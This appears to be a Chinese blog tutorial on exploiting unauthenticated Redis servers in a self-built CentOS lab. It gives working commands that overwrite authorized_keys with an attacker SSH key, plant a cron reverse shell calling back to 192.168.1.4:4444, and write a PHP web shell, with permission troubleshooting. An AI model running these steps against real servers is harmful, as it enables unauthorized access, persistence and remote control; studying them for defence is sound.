Redis未授權訪問漏洞詳解

原創 sojrs_sec 2020-06-20 04:19

環境搭建

環境:centos7 gcc

1:下載安裝包
wget http://download.redis.io/releases/redis-3.2.6.tar.gz

2:解壓安裝包到指定文件
tar zxvf redis-3.2.6.tar.gz -C /usr/local

3:cd /usr/local/redis-3.2.6

4:make 進行編譯

5:cd src && make install

6:export PATH=$PATH: /usr/local/redis-3.2.6/src 添加環境變量

7:cd … &&vim redis.conf 修改protected-mode no使之可遠程登錄,修改daemonize yes使之可後臺運行,註釋bind 127.0.0.1使之可遠程登錄

8:redis-server /usr/local/redis-3.2.6/redis.conf 啓動redis,注意要指定配置文件
9: redis-cli -h 127.0.0.1 -p 6379 shutdown 關閉redis
以上爲默認配置,redis端口爲6379,沒有密碼,導致未授權訪問

root用戶啓動利用

1.ssh 密鑰登錄

1. ssh-keygen -t rsa
2. (echo -e "\n"; cat id_rsa.pub; echo -e "\n") > auth_key
3. cat auth_key | redis-cli -h hostname -x set crackit
4. redis-cli -h hostname
5. config set dir /root/.ssh/  
這裏設置目錄時,可能存在(error) ERR Changing directory: No such file or directory
這是因爲root從來沒有登錄過,在被攻擊機執行ssh localhost 即可
(error) ERR Changing directory: Permission denied
說明redis並不是以root啓動的
6. config set dbfilename "authorized_keys"
7. save

退出redis
8. ssh -i id_rsa root@redis_server 即可登錄成功

2.計劃任務反彈shell

1. redis-cli -h 192.168.1.8
2. set test "\n* * * * * bash -i >& /dev/tcp/192.168.1.4/4444 0>&1\n" 
3. config set dir /var/spool/cron
4. config  set dbfilename "root"
5. save

192.168.1.4 開啓監聽
6. nc -l 4444

普通用戶啓動利用

1.ssh 密鑰登錄

1. ssh-keygen -t rsa
2. (echo -e "\n"; cat id_rsa.pub; echo -e "\n") > auth_key
3. cat auth_key | redis-cli -h hostname -x set crackit
4. redis-cli -h hostname
5. config set dir /home/user/.ssh/  
這裏設置目錄時,可能存在(error) ERR Changing directory: No such file or directory
這是因爲user從來沒有登錄過,需要自己創建
6. config set dbfilename "authorized_keys"
7. save

退出redis
8. ssh -i id_rsa user@redis_server
這裏直接免密登錄可能仍會提示要求輸入密碼,查看被攻擊機的ssh連接日誌/var/log/secure
Authentication refused: bad ownership or modes for directory /home/sojrs
即被連接用戶的目錄權限存在問題,需要手工設置
原因:
sshd爲了安全,對屬主的目錄和文件權限有所要求。如果權限不對,則ssh的免密碼登陸不生效。
用戶目錄權限爲 755 或者 700,就是不能是77x,創建者必須爲user。
.ssh目錄權限一般爲755或者700。
rsa_id.pub 及authorized_keys權限一般爲644
rsa_id權限必須爲600
總的來說,如果是非root用戶啓動,比較雞肋,需要普通用戶事先配置好免密登錄的各項目錄及權限,否則很容易失敗

2.計劃任務反彈shell

1. redis-cli -h 192.168.1.8
2. set test "\n* * * * * bash -i >& /dev/tcp/192.168.1.4/4444 0>&1\n" 
3. config set dir /var/spool/cron
(error) ERR Changing directory: Permission denied
查看/var/spool/cron 目錄權限爲700,且爲root創建
即使該普通用戶具有sudo權限也不行

5. config  set dbfilename "root"
6. save
無法利用

Web服務寫馬

1. config set  dir /var/www/html/
2. config set  dbfilename shell.php
3.  set  cmd "<?php phpinfo(); ?>"
4. save

web服務寫馬需要知道web的安裝路徑
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Apache solr xxe漏洞復現(CVE-2017-12629)

Apache solr xxe漏洞復現(CVE-2017-12629)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 7.1 Apache Lucene < 7.1 環境搭建 啓動docker syste

whojoe 2020-07-07 23:32:01

Apache Solr 遠程命令執行漏洞復現(CVE-2017-12629)

Apache Solr 遠程命令執行漏洞復現(CVE-2017-12629)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 7.1 Apache Lucene < 7.1 環境搭建 啓動docker sy

whojoe 2020-07-07 23:32:01

Apache Solr rce復現(CVE-2019-0193)

Apache Solr rce復現(CVE-2019-0193)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 8.2.0 環境搭建 啓動docker systemctl start docker 獲取

whojoe 2020-07-07 23:32:01

(有下載鏈接)F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902)

F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902)前言漏洞詳情影響版本修復建議環境搭建漏洞復現參考文章 前言 漏洞詳情 F5 BIG-IP 是美國F5公司一款集成流量管理、DNS、出入站規則、web應用防火牆、

whojoe 2020-07-06 23:41:30

Apache Solr 遠程命令執行漏洞(CVE-2019-12409)

Apache Solr 遠程命令執行漏洞(CVE-2019-12409)前言環境搭建漏洞復現參考文章 前言 影響Apache Solr 8.1.1到8.2.0版本 環境搭建 啓動docker systemctl start doc

whojoe 2020-07-06 23:00:48

Apache Solr Velocity遠程命令執行漏洞(CVE-2019-17558)

Apache Solr Velocity遠程命令執行漏洞(CVE-2019-17558)前言環境搭建漏洞復現參考文章 前言 影響Apache Solr 8.1.1到8.2.0版本 環境搭建 啓動docker systemctl s

whojoe 2020-07-06 23:00:48

weblogic CVE-2020-2555 反序列化RCE 復現

文章目錄前言0x01 漏洞說明0x02 影響版本0x03 漏洞利用0x04 注意的地方0x05 修復建議0x06 時間線0x07 參考鏈接 前言 本教程及工具僅供技術學習交流、請勿用於非法行爲、否則後果自負 0x01 漏洞說明

iptableskk 2020-07-06 21:25:57

Windows SMBv3 漏洞復現(CVE-2020-0796)

Windows SMBv3 漏洞復現(CVE-2020-0796)前言環境搭建漏洞復現參考文章 前言 漏洞介紹 微軟SMBv3 Client/Server遠程代碼執行漏洞CVE-2020-0796 影響範圍: Windows 10

whojoe 2020-07-06 05:35:41

Supervisord 遠程命令執行漏洞(CVE-2017-11610)

Supervisord 遠程命令執行漏洞(CVE-2017-11610) 一、漏洞介紹 Supervisord是一款用Python語言開發的管理後臺應用(服務)的工具,方便運維人員使用圖形化界面進行管理。 Supervisord曾

limb0 2020-07-05 19:14:36

Drupal Drupalgeddon 2 遠程代碼執行漏洞(CVE-2018-7600)

Drupal Drupalgeddon 2 遠程代碼執行漏洞(CVE-2018-7600) 一、漏洞介紹 2018年3月28日,Drupal官方發佈新補丁和安全公告,宣稱Drupal 6,7,8等多個子版本存在遠程代碼執行漏洞,攻

limb0 2020-07-05 19:14:36

Apache Tomcat文件包含漏洞復現(CVE-2020-1938)

Apache Tomcat文件包含漏洞復現(CVE-2020-1938)前言影響編號環境搭建漏洞復現參考文章 前言 影響 Apache Tomcat = 6 7 <= Apache Tomcat <7.0.100

whojoe 2020-07-05 14:51:22

CVE-­2020­-0796(永恆之黑)漏洞復現Getshell

MySQL數據庫從入門到實戰應用 CVE-­2020­-0796漏洞復現CVE-­2020­-0796受影響的系統版本環境搭建漏洞檢測-掃描漏洞復現-返回會話漏洞復現-藍屏攻擊視頻演示漏洞修復 CVE-­2020­-0796

小陈classmate 2020-07-05 14:10:43

Solr漏洞 CVE-2019-17558漏洞復現

CVE-2019-17558漏洞復現前言 Apache Solr 是一個開源的搜索服務器。 cve-2019-17558 Apache Solr 代碼注入漏洞 漏洞影響版本5.0.0 到 8.3.1 漏洞影響:用戶可以注入自定

小陈classmate 2020-07-05 14:10:42

Drupal 遠程代碼執行漏洞(CVE-2019-6339)

Drupal 遠程代碼執行漏洞(CVE-2019-6339) 一、漏洞介紹 Drupal core是Drupal社區所維護的一套用PHP語言開發的免費、開源的內容管理系統。 Drupal core 7.62之前的7.x版本、8.6

limb0 2020-07-04 12:23:17

CVE-2020-1948補丁繞過 Apache Dubbo 遠程代碼執行漏洞

漏洞背景 2020年06月23日, 360CERT監測發現 Apache Dubbo 官方 發佈了 Apache Dubbo 遠程代碼執行 的風險通告,該漏洞編號爲 CVE-2020-1948,漏洞等級:高危。 Apache Du

AmyBaby囍 2020-07-04 11:53:11